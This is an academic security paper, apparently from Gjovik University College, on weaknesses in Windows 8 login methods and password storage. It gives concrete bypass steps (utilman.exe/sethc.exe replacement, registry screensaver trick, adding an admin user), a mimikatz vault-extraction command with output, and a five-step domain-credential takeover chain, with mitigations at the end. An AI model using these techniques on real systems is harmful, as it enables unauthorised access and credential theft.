SlideShare una empresa de Scribd logo
1 de 17
Descargar para leer sin conexión
Vulnerabilities in login authentication methods and
password storage in Windows 8
John-Andre Bjorkhaug
Gjovik University College
March 2014
Today, with the rise of touchscreen devices, like tablets, smartphones and even laptops with
touchscreens, users might find it to cumbersome to type in regular passwords. Typing for example
a eight character password containing both regular letters, numbers and even symbols takes too
much time and is often not so easy for for the average user, on a touchscreen keyboard. The
companies developing these devices have taken the problem under consideration, and have come
up with alternative authentication methods replacing the password, for example biometrics, PINs,
gestures and so on. This paper will focus on the different methods used for logon authentication
in the Microsoft Windows 8 and 8.1 operating system, since this now is appearing on more and
more touchscreen devices. This paper starts with an introduction, explaining some of the new
features of Windows 8. Then there is an introduction to works that are related to this paper.
Following is a section about classic attacks on passwords in Windows, techniques for bypassing
login authentication, and how passwords can be extracted in clear-text. Then it is time to dive in
to Windows 8, and the new methods for login authentication and their vulnerabilities. The paper
ends with a conclusion with some suggestions to techniques that can be used to mitigate some of
the vulnerability discussed throughout this paper.
Categories and Subject Descriptors: D.4.6 [Security and Protection ]: Invasive software—
Operating system security
General Terms: security
Additional Key Words and Phrases: operating system security, passwords, authentication, PIN
1. INTRODUCTION
Today, devices with touchscreens, like smartphones, tablets and laptops, are get-
ting more and more usual, and operating systems like Android and iOS have been
dominating for some years. Using text-based passwords, containing for example
both upper and lower cases, numbers and even symbols takes too much time and
is often not so easy for for the average user, using touchscreen softkeyboards. The
companies developing these devices have taken the problem under consideration,
and have come up with alternative authentication methods replacing the password,
for example biometrics, PINs, gestures and so on. PIN codes and the regular ges-
ture password used on different touch devices for years, have a very small password
space, compared to a good old text-based password. In Windows 8, Microsoft pre-
sented some new native methods for logging in to a Windows system, the use of a a
four digit PIN code, the so called picture password, and fingerprint. A four digit PIN
code, says itself that it is not very secure, a picture password can be very secure,
if implemented correctly. Even though Microsoft Windows have been available in
different forms on different touch devices for many years, a lot happened when they
Vulnerabilities in login authentication methods and password storage in Windows 8 · 2
made Windows 8. This version of Windows runs just as good, on touch devices,
and on desktop computers. You have the possibility to use the good old desktop
for use on laptops and desktop computers, and the new tile interface called Modern
UI 1
which is better fitted for touch devices. Recently there have also been a rise
in both laptops and desktop computers with touch screen. Microsoft Windows 8
was released in August 2012, and was available to the general public in the end of
October the same year. Windows 8.1 came out in October 2013, with small changes
compared to 8 [ZDNet 2014]. Actually, 8.1 can in many ways be looked at like more
of a servicepack than a full OS upgrade. Windows 8 can be said to have been of the
biggest changes, at least visually, since Windows 95 replaced Windows 3.11, but at
least Windows 8 was very Windows 7 like, when not using the new tile interface.
Since Windows 8 is relatively new, there is still some children’s diseases, and both
the operating system and the users still need to mature a bit. In addition to adding
Modern UI for use on devices with a touchscreen, Microsoft also included several
authentication methods, to make the operating system even more user friendly on
touch device. In addition to the good old password, methods like PIN code and
Picture password have been included from Windows 8. The reason for this is so the
user don’t have to type in passwords like ”Tr0ub4dor” [xkcd 2013] on the devices’
limited software keyboard, where for example the use of the ”shift” key is rather
cumbersome. This new login authentication methods have introduced quite a bit
of new vulnerabilities in to the login authentication in Windows, in addition to the
once that have been there for years.
This paper will discuss both old and new login authentication methods, and their
vulnerabilities. All tests performed in this paper have been done on a VMWare
Virtual machine and a Dell Venue 11 Pro tablet, both running Windows 8
This paper is organized as follows. Section 1 is the introduction you now are
reading. Section 2 gives an introduction to works that are related to this paper.
Section 3 is about classic attacks on passwords in Windows, techniques for bypassing
login authentication, and how passwords can be extracted in clear-text. Section 4
gives details about the new authentication methods used for logging in Windows 8,
and their vulnerabilities. The paper ends with section 5, the conclusion with some
suggestions to techniques that can be used to mitigate some of the vulnerability
discussed throughout this paper.
2. RELATED WORK
Most books covering ethical hacking and penetration testing have a section about
extracting and cracking LM and NTLM hashes, for example the ”Hacking Exposed”
series [McClure et al. 2009]. The ”new” authentication forms for Windows, picture
passwords and PIN code is not so much written about yet seen in context with
Windows, but the paper ”On the Security of Picture Gesture Authentication” by
Ziming Zhao et.al. [Zhao et al. 2013] describes a rather comprehensive research on
picture passwords, describing an empirical analysis of picture gesture authentication
from more than 10,000 pictures passwords. This paper focus more on how the login
mechanism works together with the rest of the operating system. When it comes
to PIN codes, there have been some statistically research done among others by
1Many still call the interface by its earlier name Metro
Vulnerabilities in login authentication methods and password storage in Windows 8 · 3
Joseph Bonneau et.al. at the Cambridge University [Bonneau et al. 2012], and the
company ”Datagentics” [DataGenetics 2012]. Also, much of the content in this
paper is relatively new, and only discussed in blog belonging to the smart guys who
find vulnerabilities, and write exploits. Like for example the blog of the Russian
company Passcape [Passcape 2014], and the French security researcher Benjamin
Delpy aka ”gentilkiwi” [Delpy 2014a].
3. CLASSICAL LOGIN AUTHENTICATION VULNERABILITIES IN WINDOWS
Before going into the vulnerabilities that is new to Windows 8, because of the new
login authentication methods, the good old vulnerabilities in the login mechanism
and passwords storage, that are still valid for Windows 8.x, will be discussed.
Fig. 1. Password login screen in Windows 8.1, with the choice of login method below the input
field.
3.1 Password hashing
In Microsoft Windows, a cryptographic hash of the password is stored in a file called
”SAM” (Security Accounts Manager), which is stored in %systemroot% system32
config SAM. This file is a part of the registry, and in an officially undocumented
binary format [Hagen 2014]. In the Windows registry the SAM is placed under
the key HKEY LOCAL MACHINESAM. Both of these locations are locked
even for the administrator while the operating system is running, but it is possible
to extract the hashes for example from the registry on a running system with
the help of DLL-injection into the LSASS (Local Security Authority Subsystem
Service) process, with tools like for example pwdump, fgdump, Cain & Abel and
mimikatz, which we will discuss more later. Other places to extract hashes from is
among others from a shadow copy of the SAM file. Readers which is interested in
knowing more about what can be find in the LSASS process, is recommended to
read [Passcape 2011].
There are two different hash algorithms, called ( LM) (LAN Manager) and NTLM
(NT LAN Manager). From Windows Vista and Server 2008, LM hash have been
the default disabled, but can be enabled for backwards compatibility. A LM hash
can be used for passwords up to 14 characters, and have a serious vulnerability.
The password is split in two halves, the first one seven characters and the second
one the rest of the password. For example a password of length 10 is split into
one hash calculated from the first seven characters, and one with the last three
characters. All letters are then capitalized. This is then cutting a password of
14 characters from 284
to 237
different combinations [McClure et al. 2009]. This
makes cracking of LM-hashes very fast, using for example Rainbow tables, which
Vulnerabilities in login authentication methods and password storage in Windows 8 · 4
is pre-calculated tables with passwords and hashes. This paper will not go any
further into the cracking of LM-hashes, since this is out of scope for the paper.
For more information see for example [McClure et al. 2009]. When it comes to
NTLM hashes, there is a much bigger keyspace, but Rainbow tables are still a
very effective method for cracking these hashes, because there is no salting of the
hash. The problem is that with NTLM’s large keyspace, tables get very space
consuming. One of the largest publicly available rainbow tables for NTLM today,
is a table covering upper and lower cases, the numbers 0-9 and space, for passwords
with length 1 to 7 characters. This table is a little over 1TB big. Compared with a
rainbow table for LM hash, which covers all symbols on the keyboard, and password
length 1 to 7 characters, which in reality means 1-14 since the password is split in
two, which is 34GB [Freerainbowtables 2014]. The term salting the hash means
that a random value is added to the password before the hash algorithm is run,
and by that creating different hashes when the same password is hashed twice.
The password hashing mechanism in for example Linux salts its hashes. Salting
the hash mitigates attacks like rainbow tables [McClure et al. 2009]. Lately there
have also been very popular to use the GPU 2
, on graphic cards to increase the
speed of cracking cryptographic hashes. Since these are much more effective on the
simple mathematical operations used in hashing than regular CPU’s. According
to Jeremy Gosney 3
, one of the worlds top experts in password cracking, with a
regular graphic card like the AMD RadeonTM
HD 7970, it will will be possible to
brute-force NTLM hashes at approximately 20 billion passwords per second. With
a cluster of graphic cards, like for this can be multiplied by the number of graphic
cards. One down thing with building machines for password cracking with graphic
cards is that it gets rather expensive. In February 2014 an AMD RadeonTM
HD
7970 costs approximately NOK3000 in Norway. But why build your own password
cracking machine, when Amazon EC2 offers multiple graphic cards in their cloud
computers, which can be rented for as low as $2 per hour [Amazon 2014]. It is
very common to use large dictionaries, to shorten the time to crack a password.
Today, when there have a numerous leaks with large password databases, there is no
problem for adversaries to create very effective dictionaries. The biggest password
leak up till now is the leak of over 32,000,000 user accounts from the game producer
RockYou in 2009 [Skullsecurity 2011].
Cracking password hashes can be done for example with tools like the following:
—John The Ripper
—L0phtCrack
—Cain & Abel
—Ophcrack
—OclHashCat
—Tools from ElcomSoft
If a computer is compromised, the NTLM hashes are extracted, and the adversary
isn’t able to crack the password, the hash can still be useful. The hash can be used
2Graphic Processing Unit
3Twitter conversation between me and him
Vulnerabilities in login authentication methods and password storage in Windows 8 · 5
in a so called pass-the-hash attack, where the hash is used for authentication to
other systems connected to the same network as the adversary and using same
password as the compromised system, inter-system password re-use [Wolthusen
2014]. This can be done with tools like for example mimikatz and modifications of
the psexec tool, which is included in the penetration testing framework Metasploit
[Rapid7 2011]. This is an very effective attack in a Windows environment where
the same administrator password is used on multiple computers, and have been
used on numerous penetration tests by the author of this paper, which a very high
successful rate. Up until the Windows 8.1 and Windows 2012 R2, it was only
possible to run limited resources with the use the pass-the-hash attack, but here
Microsoft implemented a security feature in Remote Desktop Protocol (RDP) called
Restricted Admin, which actually makes it possible to connect to an RDP service
using the pass-the-hash attack [Falde 2013] [Ronin 2014] [Lowe 2013]. As most
other attacks on passwords in Windows, this can also be done with mimikatz, but
also with a more known and recognized application called FreeRDP, which is an
open implementation of the RDP protocol [Ronin 2014].
3.2 Clear text password extraction
In the recent years it have also gotten publicly known that because of feature in
Windows called WDigest, it is possible to extract passwords in cleartext from mem-
ory, using tools like mimikatz [Delpy 2014b] [Delpy 2011], or Windows Credential
Editor [Amplia 2013]. WDigest is a DLL which that was first added in Windows
XP, and used to authenticate users against HTTP Digest authentication and Sim-
ple Authentication Security Layer exchange. These two authentications methods
requires a plain-text password to be able to function. To extract passwords from
WDigest, the adversary need to access a computer that is turned on and logged in,
but how many average users lock their computer when they go to the toilet? Similar
vulnerabilities also apply to other features that was implemented from Windows
NT 6 (Windows Vista and Windows Server 2008). Like for example when Single
Sign On (SSO) to Remote Desktops is enabled (tspkg) [Delpy 2014d], if a Microsoft
Live account (LiveSSP4
) is used [Delpy 2012], and for the use with Kerberos SSP.
Actually in Windows 8.1 wdigest and tspkg is default disabled, but when SSO for
websites or RDP is enabled, wdigest and tspkg is too. The password stored in mem-
ory for all these scenarios are actually encrypted, but with such a bad method that
it is very easy to decrypt it. The standard Windows function LsaProtectMemory
is used for encryption, and LsaUnotectMemory for decryption [Pilkington 2012].
More methods for extracting passwords in clear-text will follow, when we later
discuss some new vulnerabilities in Windows 8.
3.3 Bypassing login authentication
The techniques discussed earlier assumes that the adversary already have access to
the victim system, either by being a user of a multiuser system, which want to forge
the identify of other users of the same system, or an adversary that have gotten
access to a system which is powered on and already logged in. But what if the
system is shut down, or locked? Let’s discuss some classical options to bypass the
4Security Support Provider
Vulnerabilities in login authentication methods and password storage in Windows 8 · 6
login authentication in Windows. Some of these attacks have been known all the
way back to Windows XP, but are still not fixed in Windows 8.1.
Password reset
Probably the most known and most used Windows login bypass is the use of a
bootable media, to edit the SAM file. This trick is very simple, but it can leave
easily found traces that an adversary have accessed the system. This trick works
by booting the system with another operating system, most often a small Linux
distribution and edit the SAM-file, which was discussed earlier. This works like
a charm since Windows isn’t running. With tools like for example Offline NT
Password and Registry editor developed by Peter Nordahl Hagen [Hagen 2014], it
is possible to things like:
—Change or clear a users password
—Enable disabled accounts
—Create new users
—Remove users
—Change a users group
To access a system without leaving any easy to find traces, the adversary could
create a new user, add it to the ”admin” group, log in to the system and at the end
delete the newly added user.
msv1 0.dll patching at boot-time
If creating a new user is not desired, patching the DLL file ”msv1.0.dll” can be a
nice option. This DLL is called by the Local Security Authority (LSA), which is
mentioned earlier, and processes login data collected by the Credential Providers
5
, for the Winlogon process [Microsoft 20xx]. At boot-time, this can be done using
tools like Kon-Boot [thelead82 2013]. This application silently bypass the login
authentication on any modern Windows operating system, by pathcing msv1 0.dll
when it is loaded into memory. The pathching causes the password-check to always
return true, which causes all accounts to not require a password, and will overwrite
any old passwords. The way this tool is used is to boot the computer from a some
kind of external medium, CD, DVD, USB stick etc., a Kon-Boot boot screen will
then be displayed while the tool is working. Then, when the Windows login screen
is visible, select the one want to log in as, and log in without any password. When
the computer then is rebooted, the victim logs in like he have always done, with
his good old password.
As a site note, it is also available for Apple OS X, but working in a different way.
msv1 0.dll patching with Firewire
IEEE 1394, commonly known as Firewire, is another interesting case, when it come
to bypassing Windows login authentication. The vulnerability with Firewire is that
it have direct access to the physical memory addresses, making it possible to patch
the msv1 0.dll, just as mention earlier, but this time at run-time. This attack was
5Credential Providers replaced the more known GINA from Windows Vista [Griffin 2007]
Vulnerabilities in login authentication methods and password storage in Windows 8 · 7
first demonstrated using a modified iPod running Linux and a script called win-
lockpwn in 2008 [Spylogic 2008]. Either the iPod-Linux or the winlockpwn tool
are updated anymore, but thanks to Carsten Maartmann-Moe, a new tool called
Inception was released in 2011[Maartmann-Moe 2011], based on winlockpwn. Most
new computers today don’t have a firewire port, but for an adversary, in many cases
this is not a problem. Firewire ports can be bought as PCMCIA cards, and when
these are inserted into the computer’s PCMCIA port, the drivers will be installed
by them self, even if the computer is locked. An interesting thing here is that the
Firewire attack can also be used when the harddisk in the computer is encrypted
with for example BitLocker, if the computer is not shut down, but only locked.
As another site note, Inceptioon is also able to bypass password on Apple OS X
and Ubuntu.
Utilman bypass
This again is a very old and quite known trick, and it actually have been recom-
mended by Microsoft to use this technique to bypass a forgotten password. This
technique was possible already in Windows 2000, so why this is still possible in
Windows 8.1, is a mystery. This technique takes advantage of a utility called Util-
man, which is used for the accessibility features magnifier, narrator and on-Screen
Keyboard. This utility is available at the login screen in all newer Windows version,
and can be opened by pressing the Windows button together with the letter U. The
problem with this, is that if the system is booted with for example a Linux Live-CD,
and the adversary can access the files on the harddisk, he can remove or change the
name of the file ”utilman.exe”, which is located in %systemroot%system32, and
then copy ”cmd.exe” to ”utilman.exe”. When the system then is rebooted, and the
login screen once again appear, the adversary can press Win+U, and a command
prompt window running with system privileges will pop-up. See Figure 3. The file
”sethc.exe”, which also is located in %systemroot%system32, can be exploited
in a very similar way. This file is used for the ”Sticky keys” feature of Windows,
and it will run if the user presses the ”shift” key five times in a row. If cmd.exe
is copied to sethc.exe, and the ”shift” key is pressed five times at the login screen,
the command prompt will again pop-up. [Dieterle 2014]. If a command prompt
isn’t good enough for the adversary, he can add users, change passwords, delete
users and so on using Windows’ net commands, since the prompt shell is running
as a ”system” user. For example create a user with netuser/addevilhacker∗ /foot-
noteThe * will ask the user to set the password and add it to the ”administrator”
group with netlocalgroupadministrators/addevilhacker.
Login screensaver
Another not so known trick, which works for Windows 7 and Windows 8.x, and is
in a way related to the utilman.exe bypass is to enable a screensaver at the login
screen, but instead of a screensaver for example cmd.exe is opened. This can be
done by adding the following REG SZ values to the registry key HKEY USERS
.Default ControlPanel Desktop [Superuser 2012]:
SCRNSAVE.EXE = C: WINDOWSSYSTEM32LOGON.SCR
ScreenSaveActive = 1
Vulnerabilities in login authentication methods and password storage in Windows 8 · 8
ScreenSaveIsSecure = 0
ScreenSaveTimeOut = 10 (time before screensaver starts in seconds)
Then, at the login screen, after for example 10 seconds, the cmd.exe windows will
pop up with system privileges.
Now, let us finish the old stuff, and cough up something new(ish).
4. PRESENTING: WINDOWS 8
Finally, the the essentials of this paper. Login authentication methods that are
new in Windows 8. Starting with some background material about the ”root of all
evil”, the Data Protection Application Programming Interface and Windows Vault
and the Windows Vault.
4.1 Data Protection Application Programming Interface and Windows Vault
First a little about the DPAPI, which is very difficult to find some official infor-
mation about. Books like ”Windows Internal”, which is most cases answers almost
anything about the internals of Windows, doesn’t contain any information about
the Windows Vault and the Data Protection Application Programming Interface
(DPAPI). The only information available from Microsoft is the public interface to
DPAPI, no internal details are published. Can it be because of the serious vulner-
abilities in these features of Windows? Although there have been multiple tries on
reverse engineering the The best source is from the Russian company ”Passcape”
[Passcape 2012a], and the paper ”Recovering Windows Secrets and EFS Certifi-
cates Offline” [Burzstein and Picod 2010] by Elie Burztein et.al, which presents a
complete reverse engineering project of DPAPI. Together with this paper, Burztein
et.al. also released an application called DPAPick, which can be used to decrypt
offline DPAPI secrets. This paper is highly recommended if the reader wants to
learn the detailed internals of DPAPI.
From Windows 2000, Microsoft included a special data protection interface, called
Data Protection Application Programming Interface, DPAPI for short. This inter-
face is used for easy store sensitive data on a disk under Windows. And currently
DPAPI is used in many Windows applications and subsystems, and handling tasks
like the file encryption system, wireless network key storage, Internet Explorer,
Outlook, Skype, Credential Manger, Microsoft Vault and so on. Each encrypted
unit is called a ”blob”. The DPAPI is considered very easy to use for encryption
(CryptProtectData) and decryption (CryptUnprotectData) of data, and therefore
very popular among programmers. The Russian company Passcape was the first
to release software capable of decrypting and extracting data which had been en-
crypted with DPAPI on a live system.
In theory, DPAPI sounds very secure. It uses highly known and proven cryp-
tographic algorithms. Windows 7 for example uses AES256 encryption in CBC
mode, SHA512 for hashing, and PBKDF2 as password-based key derivation rou-
tine. There is no available information of the cryptographic algorithms used in
Windows 8.x, but we can assume they are the same as in Windows 7. This sounds
secure, but there are vulnerabilities. The operating system need to be able to read
data from the DPAPI, without any dialogue with the user. Therefore the keys to
decrypt the DPAPI is placed in so the keys must be in memory, after they are
decrypted of a master key file. This is what tools like the ones from Passcape, and
Vulnerabilities in login authentication methods and password storage in Windows 8 · 9
mimikatz uses to extract login passwords from a running system with Windows,
which will be discussed in the following sections. Up until Windows 8, it was only
possible to extract data about the currently logged in user on the actual system
using DPAPI. With DPAPI-NG in Windows 8, it is possible to decrypt and extract
data from all users, and even if the files used by DPAPI is extracted and imported
into another system. As mentioned, Windows Vault uses DPAPI to encrypt and
store passwords used by applications in Windows and by Windows itself. Windows
Vault was introduced in Windows 7, as a replacement to Credential Manager which
was in use in earlier version of Windows. The Windows Vault is what is used by
the PIN, Picture password, and fingerprint login authentication.
4.2 PIN codes and it’s vulnerabilities
The main thing to be worried about when it comes to PIN codes as login authenti-
cation in Windows 8, is that Microsoft only give you the option to use four digits.
This reduces the keyspace drastically, and if human choose the passwords, there is
a pretty big chance it will be relatively easy to guess. Especially if he adversary
have some knowledge about the victim. One can wonder why on earth Microsoft
limited PIN codes to four digits. There have been significant research done on
the security on PIN codes. Researching the statistics of PIN codes extracted from
password leaks like the one from RockYou, mentioned earlier, have ended up in
some interesting facts about PIN codes. Research have been done among others
by Joseph Bonneau et.al. at the Cambridge University [Bonneau et al. 2012], and
the company Datagentics [DataGenetics 2012]. Below is a table showing the 20
most used PIN codes, from a statistical analysis done on 3,400,000 PIN codes by
Datagentics in 2012 [DataGenetics 2012]
Nr PIN Frequency
1 1234 10.713%
2 1111 6.016%
3 0000 1.881%
4 1212 1.197%
5 7777 0.745%
6 1004 0.616%
7 2000 0.613%
8 4444 0.526%
9 2222 0.516%
10 6969 0.512%
11 9999 0.451%
12 3333 0.419%
13 5555 0.395%
14 6666 0.391%
15 1122 0.366%
16 1313 0.304%
17 8888 0.303%
18 4321 0.293%
19 2001 0.290%
20 1010 0.285%
Vulnerabilities in login authentication methods and password storage in Windows 8 · 10
Enough about general PIN code vulnerabilities. The rest of this section actually
apply not only to the use of PIN codes in Windows 8, it also applies to Picture
password and in some degree to the fingerprint login. It is discussed in this section,
because this papers handles PIN codes first. Information and vulnerabilities that
only applies to picture passwords and fingerprints, are discussed in later sections. In
2012 it became publicly known that Windows 8 stores login passwords in an easily
recoverable way when PIN or picture password is in use. This is because they
are stored in the Windows Vault, which uses DPAPI, which was discussed earlier
in this paper. Using a tool from Passcode it was possible to easily extract them
users passwords in clear-text [Passcape 2012c]. On the 8th of January 2014, I came
in contact with Benjamin Delpy aka ”gentilkiwi” on Twitter, the man behind the
open-source tool mimikatz, and asked him questions on how this was done. A few
hours later he had included this in his tool and included this feature in mimikatz.
Some days later Mr Delpy published a post on his blog describing how this was
done [Delpy 2014e].
The extraction of both the regular password, PIN code, and picture password
coordinates using mimikatz are shown below.
Running mimikatz privilege::debug token::elevate vault::list exit Note that some
non-interesting lines are removed from the output to save space in this paper.
.#####. mimikatz 2.0 alpha (x64) release "Kiwi en C"
.## ^ ##. (Mar 2 2014 22:44:55)
## /  ## /* * *
##  / ## Benjamin DELPY ‘gentilkiwi ‘ ( benjamin@gentilkiwi .com )
’## v ##’ http :// blog.gentilkiwi.com/mimikatz (oe.eo)
’#####’ with 14 modules * * */
mimikatz(commandline) # privilege :: debug
Privilege ’20’ OK
mimikatz(commandline) # token :: elevate
Token Id : 0
User name :
SID name : NT AUTHORITYSYSTEM
<snip >
....
<snip >
mimikatz(commandline) # vault :: list
Vault : {4 bf4c442 -9b8a -41a0 -b380 -dd4a704ddb28}
<snip >
....
<snip >
0. Picture Password Credential
<snip >
....
<snip >
Vulnerabilities in login authentication methods and password storage in Windows 8 · 11
*** Picture Password ***
User : venueJohn Doe
Password : Password00
Picture password (grid is 150*100)
[0] line (x = 17 ; y = 5) -> (x = 33 ; y = 65)
[1] point (x = 70 ; y = 21)
[2] point (x = 80 ; y = 20)
1.PIN Logon Credential
<snip >
....
<snip >
*** Pin Logon ***
User : venueJohn Doe
Password : Password00
PIN Code : 2580
2.PIN Logon Credential
<snip >
....
<snip >
*** Pin Logon ***
User : venueJane Doe
Password : TopSecret123!
PIN Code : 1234
<snip >
....
<snip >
When combining mimikatz with Kon-Boot, which was mentioned earlier, it is
possible to bypass login authentication, and extract login credentials for all users of
the system. This is also valid when the computer and user is members of a domain
in Active Directory. So even the adversary doesn’t get access to domain resources
when using authentication bypass tools like Kon-Boot or the Inception Firewire
attack, he can compromise a domain account with the following steps:
(1) Bypass authentication with for example Kon-Boot or Inception
(2) Extract passwords from the Vault using mimikatz
(3) Reboot computer
(4) Log in with valid credentials obtained in previous steps
(5) Jackpot! The adversary have access to the victims domain resources
It is also very interesting to know that password vault is global, so once logged in
to a system as an administrator, the user can extract login credentials for all users
of the system.
Instead of bypassing the login with tools like Kon-Boot, mimikatz can also be
run in the system privileged cmd.exe from the ”Utilman authentication bypass”
attack, as shown in figure 3.
Vulnerabilities in login authentication methods and password storage in Windows 8 · 12
Fig. 2. cmd.exe running as utilman.exe on the Windows 8.1 login screen
4.3 Picture password and it’s vulnerabilities
Picture passwords is a new login authentication method in Windows 8, based on
the gesture authentication previously in use both on Android and iOS devices with
touchscreen. The way this method works is that the user defines three gestures,
used for authentication. The three gestures can either be a single point, a circle or
a line, on a 100 by 150 grid. In the mimikatz output in the above section about
PIN codes, the coordinates for the different gestures on the picture in 3 are shown.
The line (1) goes from top to bottom of The Terminator’s shotgun, the first dot
(2) is the left glass of his sunglasses, and the second dot (3) is the right glass.
If Microsoft fix these issues, the picture password methods looks very promis-
ing, with a high number of possible combinations, and easy to use on touchscreen
devices.
As mentioned under the section about PINs, the vault-attack is the same when
using a picture password.
Also, there exists a couple of not so technical attacks on touch screen devices,
both for PIN and picture password. The Smudge attack is a method to find the
gesture pattern used to unlock touchscreen devices using this form of authentication.
This attack relies on detecting the smudge, left on the screen from grease from the
users fingers. Using proper lighting, camera settings and image processing software,
both a gesture and a PIN code can, in many cases, be recovered. This attack was
Vulnerabilities in login authentication methods and password storage in Windows 8 · 13
Fig. 3. The picture password login screen, with coordinates.
first made publicly known by a research team from the University of Pennsylvania,
at the 4th USENIX conference on Offensive technologies [Aviv et al. 2010]. The
smudge attack is in many ways similar to number keypads that have some numbers
more worn than others, which in many cases can make it possible for an adversary
to see commonly used digits. Another vulnerability both PIN codes and picture
passwords might be more exposed to is shoulder surfing [Long and Mitnick 2011],
since it is much easier to see the gesture on a picture, than the characters typed on
a keyboard.
4.4 Fingerprints and it’s vulnerabilities
From Windows 8.1, Windows got native support for fingerprint login authentication
[Microsoft 2013]. Knowing this, and how PIN and Picture password function stores
its credentials, I was curious on how this was done with fingerprints. Not able to find
any information about this, I once again asked Benjamin Delpy on the 20th January.
The 23th, he also had implemented this in mimikatz [Delpy 2014f]. It turns out
that, as suspected, the fingerprint login, stores its information in the same way as
PIN and picture password, in the Vault. And therefore, it is also possible to extract
the login passwords when fingerprint is in use. When having more knowledge on
the subject, I was able to find that Passcode already implemented this in their
commercial ”Windows Vault Explorer” in 2012 [Passcape 2012b]. In addition, off
course the fingerprint authentication in Windows is vulnerable to all the classical
attacks on fingerprint readers, like for example fingerprint printed on a paper,
latex fingers etc. This can be seen in for example the Discovery Channel show
Mythbusters episode 59 ”Crimes and Myth-Demeanors 2” [Mythbusters 2006].
Vulnerabilities in login authentication methods and password storage in Windows 8 · 14
4.5 Multi-factor login authentication and it’s vulnerabilities
On the 23.February, Benjamin Delpy once again proved his skills, and released a
new feature in his mimikatz. It was now possible to extract the the PIN code used
when a smart card is used instead of a password for authentication as Windows
login [Delpy 2014c]. According to Mr Delpy, this is valid when the native Windows
support for smartcards are used. Because of the lack of equipment to test the
extraction of PIN codes, this have not been experimented with for this paper.
There haven’t been released much information about this attack yet, so there isn’t
much information about how it is done publicly available, but it can be assumed it
works very similar to the extraction of password when PIN and picture password
is used, see Figure 4.
Fig. 4. A smartcards PIN code extracted with the use of mimikatz [Delpy 2014c]
5. CONCLUSION
Many of the attacks mentioned in this paper is like they are from a Hollywood
spy movie, but this is the reality. Microsoft have some strange vulnerabilities in
their login authentication, which there is no simple explanation for why they still
are there. Both myself and others have tried to get in touch with the Microsoft
security team, to get answers on why these techniques are still possible, but with
not luck. People that are into computer security, like probably the reader if this
paper is, tend to be aware of the risks to their computer, but the average man does
not think of this.
One of the most important security measurements for computers and other
computer-like devices, is the use of Full Disk Encryption (FDE). This will pre-
vent an adversary to access data on the computers harddisk, and in that also
prevent an adversary to bypass the login to the operating system. From Windows
7, Microsoft included a FDE method called BitLocker, which is very easy to set
up, and simple to use. The user of the computer will not notice the existence of
Vulnerabilities in login authentication methods and password storage in Windows 8 · 15
BitLocker, except by a very slight decrease in performance [Hardware 2010]. If
FDE is not an options, of some reason, security measures like for example BIOS
password or harddisk passwords can also be used. BIOS password does not prevent
an adversary from removing the harddisk out of a computer, and retrieve either
the password hashes from the SAM file, or the Windows Vault from the vault files.
What it prevents is for example the use of tools like Kon-Boot, or some other live-
CDs/DVDs/pendrives capable of either reset passwords or extract hashes, when
the adversary isn’t able to remove the disk. Harddisk password, also known as
ATA-passwords, is something for itself. It is by some company policies considered
just as good as FDE, but this is not disc encryption, it is just using a part of the
ATA standard for harddisks, and it does in many cases exist a master password,
which overwrites the one set by the user [ISEE0XDEADDISKS 2008]. Firewire
attacks bypasses all protection of the harddisk, if a user have locked a logged in
system. To mitigate this, the Firewire and/or PCMCIA port must be disabled in
a way, or automatic PCMCIA driver installation should be disabled.
The final conclusion to this paper must be, never leave you computer unattended!
REFERENCES
Amazon. 2014. Amazon ec2 pricing. http://aws.amazon.com/ec2/pricing/. Accessed : 21.feb.2014.
Amplia. 2013. Winows credential manager. http://www.ampliasecurity.com/research/windows-
credentials-editor/. Accessed : 6.mar.2014.
Aviv, A. J., Gibson, K., Mossop, E., Blaze, M., and Smith, J. M. 2010. Smudge attacks
on smartphone touch screens. In Proceedings of the 4th USENIX conference on Offensive
technologies. USENIX Association, 1–7.
Bonneau, J., Preibusch, S., and Anderson, R. 2012. A birthday present every eleven wallets?
the security of customer-chosen banking pins. In Financial Cryptography and Data Security.
Springer, 25–40.
Burzstein, E. and Picod, J. M. 2010. Recovering windows secrets and efs certificates offline.
In Proc. of the 4th USENIX Conference on Offensive Technologies. Berkeley, USA: USENIX
Association.
DataGenetics. 2012. Pin analysis. http://www.datagenetics.com/blog/september32012/. Ac-
cessed : 7.jan.2014.
Delpy, B. 2011. Re – pass the pass. http://blog.gentilkiwi.com/securite/re-pass-the-pass. Ac-
cessed : 24.feb.2014.
Delpy, B. 2012. Re - re – pass the pass. http://blog.gentilkiwi.com/securite/rere-pass-the-pass.
Accessed : 24.feb.2014.
Delpy, B. 2014a. Blog de gentil kiwi. http://blog.gentilkiwi.com. Accessed : 21.feb.2014.
Delpy, B. 2014b. mimikatz. http://blog.gentilkiwi.com/mimikatz. Accessed : 17.jan.2014.
Delpy, B. 2014c. mimikatz can now extract *pin code* of smartcards associated with lo-
gon sessions. https://twitter.com/gentilkiwi/status/437719635404673025/photo/1. Accessed
: 26.feb.2014.
Delpy, B. 2014d. Pass the pass. http://blog.gentilkiwi.com/securite/pass-the-pass. Accessed :
24.feb.2014.
Delpy, B. 2014e. Windows 8, code pin et mot de passe image.
http://blog.gentilkiwi.com/securite/mimikatz/windows-8-code-pin-mot-de-passe-image. Ac-
cessed : 23.jan.2014.
Delpy, B. 2014f. Windows 8, empreintes digitales.
http://blog.gentilkiwi.com/securite/mimikatz/windows-8-empreintes-digitales. Accessed :
24.jan.2014.
Dieterle, D. W. 2014. Basic Security Testing with Kali Linux, 1 ed. CreateSpace Independent
Publishing Platform.
Vulnerabilities in login authentication methods and password storage in Windows 8 · 16
Falde, K. 2013. Restricted admin mode for rdp in windows 8.1 2012 r2.
http://blogs.technet.com/b/kfalde/archive/2013/08/14/restricted-admin-mode-for-rdp-in-
windows-8-1-2012-r2.aspx. Accessed : 18.feb.2014.
Freerainbowtables. 2014. Rainbow tables available. https://www.freerainbowtables.com/en/tables2/.
Accessed : 26.feb.2014.
Griffin, D. 2007. Create custom login experiences with credential providers for windows vista.
http://msdn.microsoft.com/en-us/magazine/cc163489.aspx. Accessed : 24.feb.2014.
Hagen, P. N. 2014. Offline nt password and registry editor. http://pogostick.net/ pnh/ntpasswd/.
Accessed : 23.feb.2014.
Hardware, T. 2010. System encryption: Bitlocker and truecrypt compared.
http://www.tomshardware.com/reviews/bitlocker-truecrypt-encryption,2587-9.html. Ac-
cessed : 24.jan.2014.
ISEE0XDEADDISKS. 2008. List of hard disk ata master passwords.
http://ipv5.wordpress.com/2008/04/14/list-of-hard-disk-ata-master-passwords/. Accessed
: 21.feb.2014.
Long, J. and Mitnick, K. 2011. No Tech Hacking: A Guide to Social Engineering, Dumpster
Diving, and Shoulder Surfing. Elsevier Science.
